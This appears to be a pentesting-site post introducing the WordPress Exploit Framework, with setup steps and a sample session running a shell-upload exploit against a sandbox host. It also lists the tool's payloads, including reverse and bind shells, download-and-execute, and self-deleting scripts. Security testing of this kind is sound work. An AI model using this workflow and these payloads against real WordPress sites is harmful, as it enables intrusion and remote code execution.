Pentest Tools

Published on May 9th, 2016 📆 | 4581 Views ⚑


WordPress Exploit Framework

Text to Speech Demo

   WordPress Exploit Framework

WordPress Exploit Framework  is a Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.




Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install.

If bundler is not present on your system, you can install it by running gem install bundler.

make sure you have all the tooling necessary to compile C extensions:

sudo apt-get install build-essential patch

Also, make sure development header files are installed on your system:

sudo apt-get install ruby-dev zlib1g-dev liblzma-dev


How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt, from here you can search for modules using thesearch command or load a module using the use command. Loading a module into your environment will allow you to set options with the set command and view information about the module using info.  Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully


What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.

Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

[adsense size='1']

What payloads are available?

  • bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
  • custom: uploads and executes a custom PHP script.
  • download_exec: downloads and runs a remote executable file.
  • exec: runs a shell command on the remote server and returns the output to the WPXF session.
  • reverse_tcp: uploads a script that will establish a reverse TCP shell.


All these payloads, with the exception of custom, will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.


Writing modules and payloads



Source && Download

Comments are closed.